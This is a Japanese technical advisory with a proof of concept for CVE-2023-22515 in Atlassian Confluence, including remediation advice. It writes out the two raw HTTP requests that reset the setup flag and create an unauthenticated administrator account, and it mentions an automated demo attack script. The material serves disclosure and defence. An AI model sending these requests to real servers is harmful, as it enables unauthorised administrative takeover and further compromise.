
CVE-2023-22515 の技術的分析と概念実証エクスプロイト。これは Atlassian Confluence における重大なアクセス制御の破損脆弱性であり、未認証の管理者アカウント作成とシステム侵害を可能にします。
[!IMPORTANT] 緊急セキュリティ警告: この脆弱性はCVSSスコア**10.0 (Critical)**の最高リスク脆弱性です。影響を受けるバージョンを使用している場合は、即座にパッチを適用する必要があります。
CVE-2023-22515は、Atlassian Confluence Data CenterおよびServerで発見された致命的なBroken Access Control脆弱性です。攻撃者は認証なしでリモートからサーバーの設定状態を操作し、管理者アカウントを作成してシステムを完全に掌握できます。
| 項目 | 詳細内容 |
|---|---|
| 脆弱性ID | CVE-2023-22515 |
| リスク度 | CRITICAL (CVSS 10.0) |
| 影響バージョン | 8.0.0 ~ 8.5.1 (詳細バージョン確認必要) |
| 攻撃タイプ | 認証バイパス及び権限昇格 |
この脆弱性は、攻撃者が/server-info.actionエンドポイントを介してbootstrapStatusProvider.applicationConfig.setupCompleteの値をfalseに変更することでトリガーされます。
sequenceDiagram
participant Attacker as 😈 攻撃者
participant Server as 🖥️ Confluence サーバー
participant Config as ⚙️ 設定管理者
Note over Attacker, Server: 1段階: 設定状態初期化攻撃
Attacker->>Server: GET /server-info.action?setupComplete=false
Server->>Config: メモリ上の設定完了フラグ解除
Config-->>Server: 状態変更完了 (インストールモードに切り替え)
Server-->>Attacker: HTTP 200/302 OK
Note over Attacker, Server: 2段階: 管理者アカウント作成
Attacker->>Server: POST /setup/setupadministrator.action<br/>(新しい管理者情報送信)
Server->>Server: セキュリティ検証バイパス (インストールモードのため許可)
Server-->>Attacker: アカウント作成成功およびログイン
Note over Attacker, Server: 3段階: システム掌握 (RCE)
Attacker->>Server: 悪性プラグインアップロード (Web Shell)
Server-->>Attacker: リモートコマンド実行権限取得
[!NOTE] 核心原理: 永続的な設定ファイル(
confluence.cfg.xml)を修正するのではなく、メモリ上のランタイム状態を変更してアクセス制御ロジックをバイパスする方式です。
XWork2フレームワークのパラメータバインディング脆弱性と、Confluenceのアクションクラス(ServerInfoAction)において機密属性(setupComplete)に対する外部入力検証が欠落していたために発生しました。
攻撃者は単純なHTTPリクエストだけでサーバーを無力化できます。
1. 設定初期化リクエスト:
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
2. 管理者作成リクエスト:
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
本レポートとともに提供される再現キット(cve-2023-22515-repro)を通じて、安全なDocker環境で脆弱性を実践できます。
端末で実際のハッキング過程を視覚的に確認できるデモスクリプトが含まれています。
# デモ実行コマンド
bash cinematic_pwn.sh
[!TIP] デモスクリプトは実際のサーバー(
localhost:8090)に対して攻撃を実行し、管理者アカウントを作成してログインまで試みる全過程を自動化して表示します。
最も確実な解決策は、Atlassianが提供する修正済みバージョンにアップグレードすることです。
パッチが難しい場合は、ネットワークセキュリティ機器(WAF、ロードバランサーなど)で次のURLパターンへのアクセスをブロックしてください。
*/setup/*CVE-2023-22515は攻撃難易度が非常に低く、かつシステム完全掌握が可能な致命的な脆弱性です。セキュリティ担当者は直ちにパッチを適用し、侵害事故の有無を監視する必要があります。
作成日: 2026-01-16 | 作成者: Antigravity Security Analysis Team